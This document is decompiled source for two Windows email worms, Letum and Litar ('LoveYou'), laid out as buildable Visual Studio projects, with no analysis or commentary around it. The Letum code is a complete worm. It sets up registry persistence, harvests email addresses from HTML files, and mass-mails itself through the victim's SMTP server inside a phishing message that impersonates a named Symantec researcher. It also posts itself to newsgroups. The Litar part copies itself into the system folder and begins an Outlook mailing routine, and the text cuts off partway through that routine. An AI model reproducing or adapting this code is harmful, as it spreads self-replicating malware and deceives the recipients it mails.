<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{BA5580B7-C204-4CE5-AF70-F5C79C363064}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Letum</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Letum</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Letum22\Letum.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Letum", "Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.csproj", "{BA5580B7-C204-4CE5-AF70-F5C79C363064}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Debug|Any CPU.Build.0 = Debug|Any CPU
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Release|Any CPU.ActiveCfg = Release|Any CPU
{BA5580B7-C204-4CE5-AF70-F5C79C363064}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Form1
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using System.ComponentModel;
using System.Windows.Forms;
namespace Letum
{
public class Form1 : Form
{
private IContainer components = (IContainer) null;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.AutoScaleMode = AutoScaleMode.Font;
this.Text = nameof (Form1);
}
public Form1() => this.InitializeComponent();
}
}
@@ -0,0 +1,261 @@
// Decompiled with JetBrains decompiler
// Type: Letum22.Letum
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
namespace Letum22
{
public class Letum
{
private static Module self;
private static string pferrie = "peter_ferrie@symantec.com";
private static string[] nSubject = new string[7]
{
"Warning!",
"Virus Alert",
"Customer Support",
"Re:",
"Re:Warning",
nameof (Letum),
"Virus Report"
};
private static string[] nData = new string[3]
{
"Dear Users\r\n\r\nDue to the high increase of the Letum worm, we have upgraded it to Category B. Please use our attached removal tool to scan and disinfect your computer from the malware.\r\n\r\n Regards\r\n Security Response",
"Hiya,\r\n\r\n I've found this tool a couple of weeks ago, and after using it i was surprised on how good it was on squashing viruses. I wonder if avers know about this? ;)",
">>\r\n Maybe not but try this, i'm sure it will help you in your fight against malware. The engine it uses isnt to bad, but the searching speed is very fast for such a small size "
};
private static ArrayList List = new ArrayList();
[STAThread]
private static void Main()
{
Random random = new Random();
Thread thread1 = new Thread(new ThreadStart(Letum.nntp));
Thread thread2 = new Thread(new ThreadStart(Letum.smtp));
Letum.self = Assembly.GetExecutingAssembly().GetModules()[0];
Letum.CollectDirs("C:\\", Letum.List);
int index = random.Next(0, Letum.List.Count);
string str = Letum.List[index].ToString();
RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Retro", true);
if (registryKey1 == null)
{
registryKey1 = Registry.CurrentUser.CreateSubKey("Software\\Retro");
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
}
File.Delete(registryKey1.GetValue(nameof (Letum)).ToString());
File.Copy(Letum.self.FullyQualifiedName, str.ToString() + "\\" + Letum.self.ScopeName);
registryKey1.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
registryKey2.SetValue(nameof (Letum), (object) (str + "\\" + Letum.self.ScopeName));
registryKey2.Close();
thread1.Start();
thread2.Start();
if (random.Next(0, 1983) != random.Next(0, 1983))
return;
int num = (int) MessageBox.Show("Dear Peter Ferrie \n\nGeNeTiX is a person not a f**king genetically modified food product. \nShe's not happy you called her that! \n\nRegards", "Name Entry Error", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
}
private static void nntp()
{
TcpClient tcpClient = new TcpClient();
ArrayList arrayList = new ArrayList();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
int startIndex1 = 0;
object obj1 = (object) null;
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + subKeyName);
foreach (string valueName in registryKey.GetValueNames())
{
if (valueName == "NNTP Server")
obj1 = registryKey.GetValue("NNTP Server");
}
}
if (obj1 == null)
;
try
{
tcpClient.Connect("news.microsoft.com", 119);
}
catch
{
return;
}
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) stream);
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ReadLine().Substring(0, 3) != "200")
{
streamWriter.WriteLine("LIST");
string text = streamReader.ReadLine();
int num = (int) MessageBox.Show(text);
while (text != ".")
{
text = streamReader.ReadLine();
if (text != ".")
{
text = text.Substring(0, text.IndexOf(" "));
arrayList.Add((object) text);
}
}
int index1 = random.Next(0, arrayList.Count);
object obj2 = arrayList[index1];
streamWriter.WriteLine("GROUP " + obj2);
if (streamReader.ToString().Substring(0, 3) != "211")
{
streamWriter.WriteLine("POST");
if (streamReader.ToString().Substring(0, 3) != "340")
{
int index2 = random.Next(0, Letum.nSubject.Length);
string str1 = Letum.nSubject[index2];
int index3 = random.Next(0, Letum.nData.Length);
string str2 = Letum.nData[index3] + "\r\n\r\n";
FileStream fileStream = new FileStream(Letum.self.ScopeName, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
string str3 = Encoding.ASCII.GetString(numArray);
string str4 = string.Empty;
if (str3.Length % 3 != 0)
{
string str5 = new string(' ', 3 - str3.Length % 3);
str3 += str5;
}
int length = str3.Length;
for (int startIndex2 = 1; startIndex2 <= length; startIndex2 += 3)
str4 = str4 + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) / 4 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 - 1, 1)) % 4 * 16 + (int) Convert.ToChar(str3.Substring(startIndex2, 1)) / 16 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2, 1)) % 16 * 4 + (int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) / 64 + 32)) + Convert.ToString((char) ((int) Convert.ToChar(str3.Substring(startIndex2 + 1, 1)) % 64 + 32));
int count;
for (string str6 = str4.Replace(' ', '`'); startIndex1 < str6.Length; startIndex1 += count)
{
count = Math.Min(60, str6.Length - startIndex1);
stringBuilder.Append("M");
stringBuilder.Append(str6, startIndex1, count);
stringBuilder.Append("\r\n");
}
string str7 = stringBuilder.ToString();
string str8 = str7.Remove(str7.LastIndexOf("M"), 1);
string str9 = "FROM: " + Letum.pferrie + "\r\nNEWSGROUPS: " + obj2 + "\r\nSUBJECT: " + str1 + "\r\n\r\n" + (object) Letum.nData + "begin 644 " + Letum.self.ScopeName + "\r\n" + str8 + "\r\n'\r\nend\r\n.";
streamWriter.WriteLine(str9);
if (streamReader.ReadLine().Substring(0, 3) != "240")
tcpClient.Close();
}
}
}
tcpClient.Close();
}
private static void smtp()
{
TcpClient tcpClient = new TcpClient();
StringBuilder stringBuilder = new StringBuilder();
Random random = new Random();
object hostname = (object) null;
int startIndex = 0;
string str1 = "----=_NextPart_81_27_24";
string str2 = "<html><head></head><body bgcolor=\"white\" text=\"black\" link=\"blue\" vlink=\"purple\" alink=\"red\"><table border=\"0\" width=\"780\" bgcolor=\"white\"><tr><td width=\"154\" valign=\"top\" bgcolor=\"white\"><p>&nbsp; <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=\"154\"><p>&nbsp;<a href=\"http://www.symantec.com\"><img src=\"http://www.langtech.com/images/projects/symantec_logoESP.gif\" border=\"0\"></a></p><p>&nbsp;</td></tr><tr><td width=\"154\" background=\"http://security.symantec.com/sscv6/languageContent/ie/sym/images/us.navbar.background.gif\"><p>&nbsp;</p><p><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/legal_note.html\">Legal Notices</a></font><font face=\"Verdana\" size=\"1\"> <br clear=\"all\"></font><font face=\"Verdana\" size=\"1\"><a href=\"http://www.symantec.com/legal/privacy.html\">Privacy Policy</a></font></p><p>&nbsp;</p><p>&nbsp;</p><p>&nbsp;</td></tr></table><p>&nbsp;</td><td width=\"618\" valign=\"top\" bgcolor=\"white\"><p align=\"left\"><font face=\"Verdana\" size=\"2\"><br></font></p><p align=\"left\">&nbsp;</p><p align=\"left\">&nbsp; <div align=\"center\"><table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"80%\"><tr><td width=\"616\"><p align=\"left\">&nbsp;</p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Dear User,</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Due to the high increase of the Letum worm, we have upgraded it to Category B. 
Please use our attached removal tool to scan and disinfect your computer from the malware.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">If you have any comments or questions about this, then please contact us.</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Regards</font></p><p align=\"left\"><font face=\"Verdana\" size=\"2\">Peter Ferrie<br clear=\"all\"></font><font face=\"Verdana\" size=\"1\">Senior Anti-Virus Researcher / Senior Principal Software Engineer&nbsp;</font></td></tr></table></div><p align=\"left\"></p><p align=\"left\"><div align=\"center\"><table border=\"0\" cellspacing=\"1\" width=\"100%\"><tr><td width=\"100%\" bgcolor=\"white\"><p align=\"center\"><font face=\"Verdana\" size=\"1\"><B>©1995 - 2006 Symantec Corporation All rights reserved.</font></td></B></tr></table></div></td></tr></table><p></p></body></html>";
foreach (string subKeyName in Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager").GetSubKeyNames())
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\" + subKeyName, true);
hostname = registryKey.GetValue("SMTP Server") != null ? registryKey.GetValue("SMTP Server") : (object) "mail.primaryhost.org.uk";
}
FileStream fileStream1 = new FileStream(Registry.CurrentUser.OpenSubKey("Software\\Retro", true).GetValue(nameof (Letum)).ToString(), FileMode.Open, FileAccess.Read);
byte[] numArray1 = new byte[fileStream1.Length];
fileStream1.Read(numArray1, 0, (int) fileStream1.Length);
fileStream1.Close();
int count;
for (string base64String = Convert.ToBase64String(numArray1); startIndex < base64String.Length; startIndex += count)
{
count = Math.Min(76, base64String.Length - startIndex);
stringBuilder.Append(base64String, startIndex, count);
stringBuilder.Append("\r\n");
}
tcpClient.Connect((string) hostname, 25);
NetworkStream stream = tcpClient.GetStream();
StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
StreamWriter streamWriter = new StreamWriter((Stream) stream);
streamWriter.AutoFlush = true;
if (streamReader.ToString().Substring(0, 3) != "220")
{
streamWriter.WriteLine("HELO localhost\r\n");
if (streamReader.ToString().Substring(0, 3) != "250")
{
try
{
foreach (string path in Letum.List)
{
foreach (string file in Directory.GetFiles(path, "*html"))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream2 = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray2 = new byte[fileStream2.Length];
fileStream2.Read(numArray2, 0, (int) fileStream2.Length);
fileStream2.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray2)))
{
streamWriter.WriteLine("MAIL FROM: " + Letum.pferrie);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("RCPT TO: " + (object) match);
if (streamReader.ToString().Substring(0, 3) != "250")
{
streamWriter.WriteLine("DATA");
if (streamReader.ToString().Substring(0, 3) != "354")
{
"FROM: Symantec Security Response <" + Letum.pferrie + ">\r\nTO: <" + (object) match + "> " + (object) match + "SUBJECT: " + Letum.nSubject[random.Next(0, Letum.nSubject.Length)] + "\r\nMIME-Version: 1.0\r\nContent-Type: multipart/mixed;\r\n\tboundary=\"" + str1 + "\"X-Priority: 3\r\nX-MSMail-Priority: Normal\r\nX-Mailer: Microsoft Outlook Express 6.00.2900.2180\r\nX-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180\r\n\r\nThis is a multi-part message in MIME format.\r\n--" + str1 + "\r\nContent-Type: text/html;\r\n\tcharset\"iso-8859-1\"\r\nContent-Transfer-Encoding: 7bit\r\n\r\n" + str2 + "\r\n--" + str1 + "\r\nContent-Type: application/octet-stream;\r\n\tname=\"test.exe\"\r\nContent-Transfer-Encoding: base64\r\nContent-Disposition: attachment;\r\n\tfilename=\"test.exe\"\r\n\r\n" + (object) stringBuilder + "\r\n\r\n--" + str1 + "--\r\n.\r\n";
if (!(streamReader.ToString().Substring(0, 3) != "250"))
{
int num1 = 0;
if (num1 < 5)
{
tcpClient.Close();
Letum.smtp();
int num2 = num1 + 1;
}
}
}
}
}
}
}
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
tcpClient.Close();
}
private static void CollectDirs(string dir, ArrayList storage)
{
try
{
foreach (string directory in Directory.GetDirectories(dir))
{
storage.Add((object) directory);
Letum.CollectDirs(directory, storage);
}
}
catch (UnauthorizedAccessException ex)
{
}
}
}
}
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Resources
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[DebuggerNonUserCode]
[CompilerGenerated]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (Letum.Properties.Resources.resourceMan == null)
Letum.Properties.Resources.resourceMan = new ResourceManager("Letum.Properties.Resources", typeof (Letum.Properties.Resources).Assembly);
return Letum.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Letum.Properties.Resources.resourceCulture;
set => Letum.Properties.Resources.resourceCulture = value;
}
}
}
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,26 @@
// Decompiled with JetBrains decompiler
// Type: Letum.Properties.Settings
// Assembly: Letum, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 221BE71B-F8E4-4988-810C-E676D4789C8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Letum.c-4bd65854e1fc8771506bbe03c7439b7af842a936a933642f2538f5e68812d29c.exe
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Letum.Properties
{
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = new Settings();
public static Settings Default
{
get
{
Settings defaultInstance = Settings.defaultInstance;
return defaultInstance;
}
}
}
}
@@ -0,0 +1,13 @@
using System;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: CLSCompliant(true)]
[assembly: AssemblyProduct("")]
[assembly: AssemblyDescription("")]
[assembly: Guid("A2840898-9532-490E-8EC6-A49A97DD6F3A")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyVersion("1.0.797.9891")]
@@ -0,0 +1,43 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9338A72F-0480-414E-8A25-9D739143F29B}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>LoveYou</AssemblyName>
<ApplicationVersion>1.0.797.9891</ApplicationVersion>
<RootNamespace>LoveYou</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LoveYou", "Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd.csproj", "{9338A72F-0480-414E-8A25-9D739143F29B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9338A72F-0480-414E-8A25-9D739143F29B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9338A72F-0480-414E-8A25-9D739143F29B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9338A72F-0480-414E-8A25-9D739143F29B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9338A72F-0480-414E-8A25-9D739143F29B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,379 @@
// Decompiled with JetBrains decompiler
// Type: LoveYou.Module1
// Assembly: LoveYou, Version=1.0.797.9891, Culture=neutral, PublicKeyToken=null
// MVID: A69AE25C-A63F-4698-B17A-9CFCAC868A1B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Litar-f42270356f25e0fc4def19fc2589ed7ebdd6dda94d7d6c5bcbfeef3d3f1545fd.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Timers;
namespace LoveYou
{
[StandardModule]
internal sealed class Module1
{
[AccessedThroughProperty("Timer1")]
private static Timer _Timer1;
public const int FILE_ATTRIBUTE_HIDDEN = 2;
public static object fs;
public static Timer Timer1
{
[MethodImpl(MethodImplOptions.Synchronized)] set
{
if (Module1._Timer1 != null)
Module1._Timer1.Elapsed -= new ElapsedEventHandler(Module1.Timer1_Elapsed);
Module1._Timer1 = value;
if (Module1._Timer1 == null)
return;
Module1._Timer1.Elapsed += new ElapsedEventHandler(Module1.Timer1_Elapsed);
}
get => Module1._Timer1;
}
[DllImport("kernel32", EntryPoint = "SetFileAttributesA", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern long SetFileAttributes([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpFileName, long dwFileAttributes);
[STAThread]
public static void Main()
{
string str = "静儿,我爱你!Starlight制作";
str = "Jing'er, I Love You! by Starlight";
if (StringType.StrCmp(Interaction.Command(), "", false) == 0)
{
Module1.fs = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("Scripting.FileSystemObject"));
if (BooleanType.FromObject(ObjectType.NotObj(LateBinding.LateGet(Module1.fs, (Type) null, "FileExists", new object[1]
{
(object) (Module1.GetSystemPath() + "\\" + Process.GetCurrentProcess().ProcessName + ".exe")
}, (string[]) null, (bool[]) null))))
Module1.CopyMeToSystemFolder();
if (BooleanType.FromObject(ObjectType.NotObj(Module1.IsInfected())))
Module1.InfectByEmail();
}
if (Strings.InStr(Interaction.Command(), "/t") != 0)
{
Module1.Timer1 = new Timer(50000.0);
Module1.Timer1.AutoReset = true;
Module1.Timer1.Enabled = true;
while (true)
;
}
Module1.DoAction();
ProjectData.EndApp();
}
private static void DoAction()
{
if (Interaction.MsgBox((object) "你知道我很爱你吗?", MsgBoxStyle.YesNo | MsgBoxStyle.Question, (object) "提问") == MsgBoxResult.No)
{
if (Interaction.MsgBox((object) "唉!算了,我每次这样问你,你都是这样.我真的很爱你,相信我好吗?", MsgBoxStyle.YesNo | MsgBoxStyle.Question, (object) "提问") == MsgBoxResult.Yes)
{
int num1 = (int) Interaction.MsgBox((object) "真的吗?谢谢!我真的好高兴,你终于相信我说的了");
}
else
{
object obj = (object) "";
while (ObjectType.ObjTst(obj, (object) "", false) == 0)
obj = (object) Interaction.InputBox("那你为什么不相信我呢?告诉我好吗?", "回答");
int num2 = (int) Interaction.MsgBox(ObjectType.StrCatObj(ObjectType.StrCatObj((object) "我就知道你会这么说!", obj), (object) ",你每次都这么告诉我,算了,我相信总有一天能让你明白的"));
}
}
else
{
int num3 = (int) Interaction.MsgBox((object) "真的吗?谢谢!我真的好高兴,你相信我说的话!");
}
}
public static string GetSystemPath() => Environment.SystemDirectory;
public static void InfectByEmail()
{
label_0:
int num1;
int num2;
int num3;
Exception exception;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
num2 = 1;
object objectValue1 = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("WScript.Shell"));
label_2:
num2 = 2;
object o1 = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("Outlook.Application"));
label_3:
num2 = 3;
